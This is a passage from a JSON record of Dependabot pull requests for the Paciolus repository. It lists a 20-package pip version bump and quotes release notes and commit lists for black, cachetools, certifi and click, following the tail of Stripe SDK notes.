\u003ccode\u003ePaymentIntentModifyParamsTransferDatum\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003ebizum\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentModifyParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfigurationModifyParams\u003c/code\u003e, \u003ccode\u003ePaymentMethodConfiguration\u003c/code\u003e, \u003ccode\u003ePaymentMethodCreateParams\u003c/code\u003e, \u003ccode\u003ePaymentMethod\u003c/code\u003e, \u003ccode\u003ePaymentRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eSetupIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003eSetupIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003eSetupIntentModifyParamsPaymentMethodDatum\u003c/code\u003e, and \u003ccode\u003eSetupIntentModifyParamsPaymentMethodOption\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for \u003ccode\u003escalapay\u003c/code\u003e on \u003ccode\u003eCharge.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003eCheckout.Session.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003eConfirmationToken.PaymentMethodPreview\u003c/code\u003e, \u003ccode\u003eConfirmationTokenCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentAttemptRecord.PaymentMethodDetail\u003c/code\u003e, \u003ccode\u003ePaymentIntent.PaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentConfirmParamsPaymentMethodOption\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodDatum\u003c/code\u003e, \u003ccode\u003ePaymentIntentCreateParamsPaymentMethodOption\u003c/code\u003e, \u003cc...\n\n_Description has been truncated_","html_url":"https://github.com/Paciolus/Paciolus/pull/150","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Paciolus%2FPaciolus/issues/150","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/150/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-01T01:15:42.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4559655873","node_id":"PR_kwDOK7Bgbc7hL-cF","number":374,"state":"closed","title":"Bump the pip group across 1 directory with 20 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-15T00:34:45.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-01T01:15:42.000Z","updated_at":"2026-06-15T00:34:46.000Z","time_to_close":1207143,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":20,"packages":[{"name":"black","old_version":"26.3.1","new_version":"26.5.1","repository_url":"https://github.com/psf/black"},{"name":"cachetools","old_version":"7.1.1","new_version":"7.1.4","repository_url":"https://github.com/tkem/cachetools"},{"name":"certifi","old_version":"2026.4.22","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"click","old_version":"8.3.3","new_version":"8.4.1","repository_url":"https://github.com/pallets/click"},{"name":"fastapi","old_version":"0.136.1","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"fastapi-cloud-cli","old_version":"0.17.1","new_version":"0.18.0","repository_url":"https://github.com/fastapilabs/fastapi-cloud-cli"},{"name":"httptools","old_version":"0.7.1","new_version":"0.8.0","repository_url":"https://github.com/MagicStack/httptools"},{"name":"idna","old_version":"3.13","new_version":"3.17","repository_url":"https://github.com/kjd/idna"},{"name":"pydantic-settings","old_version":"2.14.0","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"pydantic-core","old_version":"2.46.4","new_version":"2.47.0","repository_url":"https://github.com/pydantic/pydantic"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-ldap","old_version":"3.4.5","new_version":"3.4.7","repository_url":"https://github.com/python-ldap/python-ldap"},{"name":"python-multipart","old_version":"0.0.27","new_version":"0.0.30","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"rich-toolkit","old_version":"0.19.7","new_version":"0.19.10"},{"name":"sentry-sdk","old_version":"2.59.0","new_version":"2.61.0","repository_url":"https://github.com/getsentry/sentry-python"},{"name":"starlette","old_version":"1.0.0","new_version":"1.2.1","repository_url":"https://github.com/Kludex/starlette"},{"name":"typer","old_version":"0.25.1","new_version":"0.26.4","repository_url":"https://github.com/fastapi/typer"},{"name":"uvicorn","old_version":"0.46.0","new_version":"0.48.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"watchfiles","old_version":"1.1.1","new_version":"1.2.0","repository_url":"https://github.com/samuelcolvin/watchfiles"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 20 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [black](https://github.com/psf/black) | `26.3.1` | `26.5.1` |\n| [cachetools](https://github.com/tkem/cachetools) | `7.1.1` | `7.1.4` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.4.22` | `2026.5.20` |\n| [click](https://github.com/pallets/click) | `8.3.3` | `8.4.1` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.1` | `0.136.3` |\n| [fastapi-cloud-cli](https://github.com/fastapilabs/fastapi-cloud-cli) | `0.17.1` | `0.18.0` |\n| [httptools](https://github.com/MagicStack/httptools) | `0.7.1` | `0.8.0` |\n| [idna](https://github.com/kjd/idna) | `3.13` | `3.17` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.14.0` | `2.14.1` |\n| [pydantic-core](https://github.com/pydantic/pydantic) | `2.46.4` | `2.47.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-ldap](https://github.com/python-ldap/python-ldap) | `3.4.5` | `3.4.7` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.27` | `0.0.30` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| rich-toolkit | `0.19.7` | `0.19.10` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.59.0` | `2.61.0` |\n| [starlette](https://github.com/Kludex/starlette) | `1.0.0` | `1.2.1` |\n| [typer](https://github.com/fastapi/typer) | `0.25.1` | `0.26.4` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.46.0` | `0.48.0` |\n| [watchfiles](https://github.com/samuelcolvin/watchfiles) | `1.1.1` | `1.2.0` |\n\n\nUpdates `black` from 26.3.1 to 26.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/releases\"\u003eblack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e26.5.1\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix unstable formatting of annotated assignments whose subscript annotation contains\nan inline comment (e.g. \u003ccode\u003ex: list[  # pyright: ignore[...]\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/psf/black/issues/5130\"\u003e#5130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve inline comments (including \u003ccode\u003e# type: ignore\u003c/code\u003e) immediately before a\n\u003ccode\u003e# fmt: skip\u003c/code\u003e line, avoiding AST equivalence failures (\u003ca href=\"https://redirect.github.com/psf/black/issues/5139\"\u003e#5139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrect the version in the published executables (\u003ca href=\"https://redirect.github.com/psf/black/issues/5137\"\u003e#5137\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Neovim integration guide covering conform.nvim, ALE, and simple command approaches\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/5124\"\u003e#5124\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e26.5.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for unpacking in comprehensions (PEP 798) and for lazy imports (PEP 810),\nboth new syntactic features in Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePython 3.15 is now supported. Compiled wheels are not yet provided for Python 3.15, so\nperformance may be slower than on existing Python versions. Wheels will be provided\nonce Python 3.15 is later in its release cycle. (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ccode\u003e# fmt: skip\u003c/code\u003e being ignored in nested \u003ccode\u003eif\u003c/code\u003e expressions with parenthesized \u003ccode\u003ein\u003c/code\u003e\nclauses (\u003ca href=\"https://redirect.github.com/psf/black/issues/4903\"\u003e#4903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd syntactic support for Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when an f-string follows a \u003ccode\u003e# fmt: off\u003c/code\u003e comment inside brackets (\u003ca href=\"https://redirect.github.com/psf/black/issues/5097\"\u003e#5097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve multiline compound statement headers when \u003ccode\u003e# fmt: skip\u003c/code\u003e is placed on the\ncolon line (\u003ca href=\"https://redirect.github.com/psf/black/issues/5117\"\u003e#5117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImprove heuristics around whether blank lines should appear before, within and after\ngroups of same-name decorated functions (such as \u003ccode\u003e@overload\u003c/code\u003e groups) in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5021\"\u003e#5021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix blank lines being removed between a function and a decorated class in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5092\"\u003e#5092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent string merger from creating unsplittable long lines when a pragma comment\n(e.g. \u003ccode\u003e# type: ignore\u003c/code\u003e) follows the closing bracket (\u003ca href=\"https://redirect.github.com/psf/black/issues/5096\"\u003e#5096\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRun CI on 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOutput\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/blob/main/CHANGES.md\"\u003eblack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 26.5.1\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix unstable formatting of annotated assignments whose subscript annotation contains\nan inline comment (e.g. \u003ccode\u003ex: list[  # pyright: ignore[...]\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/psf/black/issues/5130\"\u003e#5130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve inline comments (including \u003ccode\u003e# type: ignore\u003c/code\u003e) immediately before a\n\u003ccode\u003e# fmt: skip\u003c/code\u003e line, avoiding AST equivalence failures (\u003ca href=\"https://redirect.github.com/psf/black/issues/5139\"\u003e#5139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCorrect the version in the published executables (\u003ca href=\"https://redirect.github.com/psf/black/issues/5137\"\u003e#5137\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Neovim integration guide covering conform.nvim, ALE, and simple command approaches\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/5124\"\u003e#5124\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 26.5.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for unpacking in comprehensions (PEP 798) and for lazy imports (PEP 810),\nboth new syntactic features in Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePython 3.15 is now supported. Compiled wheels are not yet provided for Python 3.15, so\nperformance may be slower than on existing Python versions. Wheels will be provided\nonce Python 3.15 is later in its release cycle. (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix \u003ccode\u003e# fmt: skip\u003c/code\u003e being ignored in nested \u003ccode\u003eif\u003c/code\u003e expressions with parenthesized \u003ccode\u003ein\u003c/code\u003e\nclauses (\u003ca href=\"https://redirect.github.com/psf/black/issues/4903\"\u003e#4903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd syntactic support for Python 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5048\"\u003e#5048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when an f-string follows a \u003ccode\u003e# fmt: off\u003c/code\u003e comment inside brackets (\u003ca href=\"https://redirect.github.com/psf/black/issues/5097\"\u003e#5097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePreserve multiline compound statement headers when \u003ccode\u003e# fmt: skip\u003c/code\u003e is placed on the\ncolon line (\u003ca href=\"https://redirect.github.com/psf/black/issues/5117\"\u003e#5117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImprove heuristics around whether blank lines should appear before, within and after\ngroups of same-name decorated functions (such as \u003ccode\u003e@overload\u003c/code\u003e groups) in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5021\"\u003e#5021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix blank lines being removed between a function and a decorated class in \u003ccode\u003e.pyi\u003c/code\u003e stub\nfiles (\u003ca href=\"https://redirect.github.com/psf/black/issues/5092\"\u003e#5092\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent string merger from creating unsplittable long lines when a pragma comment\n(e.g. \u003ccode\u003e# type: ignore\u003c/code\u003e) follows the closing bracket (\u003ca href=\"https://redirect.github.com/psf/black/issues/5096\"\u003e#5096\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRun CI on 3.15 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5127\"\u003e#5127\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/87928e6d6761a4a6d22250e1fee5601b3998086e\"\u003e\u003ccode\u003e87928e6\u003c/code\u003e\u003c/a\u003e Prepare release 26.5.1 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5140\"\u003e#5140\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/c970a49702488739add6c728122deb3a99900803\"\u003e\u003ccode\u003ec970a49\u003c/code\u003e\u003c/a\u003e Preserve comments before fmt: skip lines (\u003ca href=\"https://redirect.github.com/psf/black/issues/5139\"\u003e#5139\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/5809338fd5f92d50e80c2ad312292ae6d428a480\"\u003e\u003ccode\u003e5809338\u003c/code\u003e\u003c/a\u003e Preserve inline comments inside annotation subscripts (\u003ca href=\"https://redirect.github.com/psf/black/issues/5130\"\u003e#5130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/61361b71995f6ea44ce01915bacd3ecc50642507\"\u003e\u003ccode\u003e61361b7\u003c/code\u003e\u003c/a\u003e docs: add Neovim integration guide and fix http link (\u003ca href=\"https://redirect.github.com/psf/black/issues/5124\"\u003e#5124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/ebe6018e3254629788376e619207719fbe34a849\"\u003e\u003ccode\u003eebe6018\u003c/code\u003e\u003c/a\u003e CI Hotfixes (\u003ca href=\"https://redirect.github.com/psf/black/issues/5136\"\u003e#5136\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/9cbd95f80e97c1ab4d690d1d41b81579a13bf75c\"\u003e\u003ccode\u003e9cbd95f\u003c/code\u003e\u003c/a\u003e Fix publish binaries again on Windows (\u003ca href=\"https://redirect.github.com/psf/black/issues/5134\"\u003e#5134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/3dc8e6c41911bdaedb4bac8d633979c34a112b78\"\u003e\u003ccode\u003e3dc8e6c\u003c/code\u003e\u003c/a\u003e Add new changelog (\u003ca href=\"https://redirect.github.com/psf/black/issues/5132\"\u003e#5132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/6d0fff0d5a965b9d0d3dbd7c5738d835fd574130\"\u003e\u003ccode\u003e6d0fff0\u003c/code\u003e\u003c/a\u003e Fix publish binaries workflow (\u003ca href=\"https://redirect.github.com/psf/black/issues/5133\"\u003e#5133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/d2490e24dad33b8f68c77602ee29160de0fea24b\"\u003e\u003ccode\u003ed2490e2\u003c/code\u003e\u003c/a\u003e Prepare release 26.5.0 (\u003ca href=\"https://redirect.github.com/psf/black/issues/5131\"\u003e#5131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/2b13ea76fa69d4923381df65deb1a5c896ca27ad\"\u003e\u003ccode\u003e2b13ea7\u003c/code\u003e\u003c/a\u003e Preserve multiline headers with fmt skip (\u003ca href=\"https://redirect.github.com/psf/black/issues/5117\"\u003e#5117\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/black/compare/26.3.1...26.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cachetools` from 7.1.1 to 7.1.4\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tkem/cachetools/blob/master/CHANGELOG.rst\"\u003ecachetools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev7.1.4 (2026-05-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor unit test improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.3 (2026-05-18)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev7.1.2 (2026-05-16)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eMinor type stub improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMinor documentation improvements.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eModernize build environment.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/48284d73d0a8834c9c50f8d41bb99e6f93b2dfed\"\u003e\u003ccode\u003e48284d7\u003c/code\u003e\u003c/a\u003e Release v7.1.4.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/55ea96b88a485fca9effae0f838186274f00897c\"\u003e\u003ccode\u003e55ea96b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c5439fe5dc883220b59469e450dbcbf9f4c2e52d\"\u003e\u003ccode\u003ec5439fe\u003c/code\u003e\u003c/a\u003e Add threading tests for lock-only decorators.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/91828fccd629d426157a165d38563614ba06a875\"\u003e\u003ccode\u003e91828fc\u003c/code\u003e\u003c/a\u003e Run threading tests unconditionally with timeout.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/16952edb1eb2d2ced7601e12db722008e5156912\"\u003e\u003ccode\u003e16952ed\u003c/code\u003e\u003c/a\u003e Release v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/92dd756b93813d1ddfe70893e9c219342a52e19a\"\u003e\u003ccode\u003e92dd756\u003c/code\u003e\u003c/a\u003e Prepare v7.1.3.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/ced08f52ef792a010b8171715c7842da4e11b9ac\"\u003e\u003ccode\u003eced08f5\u003c/code\u003e\u003c/a\u003e Improve cachetools.func type stubs.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/d809d7be5a222effd3663c33baaaee3802972daa\"\u003e\u003ccode\u003ed809d7b\u003c/code\u003e\u003c/a\u003e Update build environment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/c84b5e5be3d33a32d33f0988b524fb86de1e44f2\"\u003e\u003ccode\u003ec84b5e5\u003c/code\u003e\u003c/a\u003e Release v7.1.2.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/tkem/cachetools/commit/39ad61c1db56600fe903f3c4216996c491e775bf\"\u003e\u003ccode\u003e39ad61c\u003c/code\u003e\u003c/a\u003e Prepare v7.1.2.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/tkem/cachetools/compare/v7.1.1...v7.1.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2026.4.22 to 2026.5.20\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7ea151afc2ce6bef0555b9349902bd867e928dd\"\u003e\u003ccode\u003ed7ea151\u003c/code\u003e\u003c/a\u003e 2026.05.20 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/413\"\u003e#413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2026.04.22...2026.05.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `click` from 8.3.3 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/click/releases\"\u003eclick's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.4.1\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.1 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.1/\"\u003ehttps://pypi.org/project/click/8.4.1/\u003c/a\u003e\nChanges: \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-1\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-1\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/click/milestone/32?closed=1\"\u003ehttps://github.com/pallets/click/milestone/32?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eget_parameter_source()\u003c/code\u003e is available during eager callbacks and type conversion again. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3458\"\u003e#3458\u003c/a\u003e \u003ca href=\"https://redirect.github.com/pallets/click/issues/3484\"\u003e#3484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eZsh completion scripts parse correctly on Windows. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3277\"\u003e#3277\u003c/a\u003e # 3466\u003c/li\u003e\n\u003cli\u003eShell completion of \u003ccode\u003eChoice\u003c/code\u003e \u003ccode\u003eEnum\u003c/code\u003e values produces a valid completion result. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3015\"\u003e#3015\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix empty byte-string handling in echo. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3487\"\u003e#3487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix closed file error with \u003ccode\u003eecho_via_pager\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/click/issues/3449\"\u003e#3449\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.4.0\u003c/h2\u003e\n\u003cp\u003eThis is the Click 8.4.0 feature release. A feature release may include new features, remove previously deprecated code, add new deprecation, or introduce potentially breaking changes.\u003c/p\u003e\n\u003cp\u003eWe encourage everyone to upgrade. You can read more about our \u003ca href=\"https://palletsprojects.com/versions\"\u003eVersion Support Policy\u003c/a\u003e on our website.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/click/8.4.0/\"\u003ehttps://pypi.org/project/click/8.4.0/\u003c/a\u003e\nChanges:  \u003ca href=\"https://click.palletsprojects.com/page/changes/#version-8-4-0\"\u003ehttps://click.palletsprojects.com/page/changes/#version-8-4-0\u003c/a\u003e\nMilestone \u003ca href=\"https://github.com/pallets/click/milestone/30\"\u003ehttps://github.com/pallets/click/milestone/30\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eParamType\u003c/code\u003e typing improvements. \u003ca 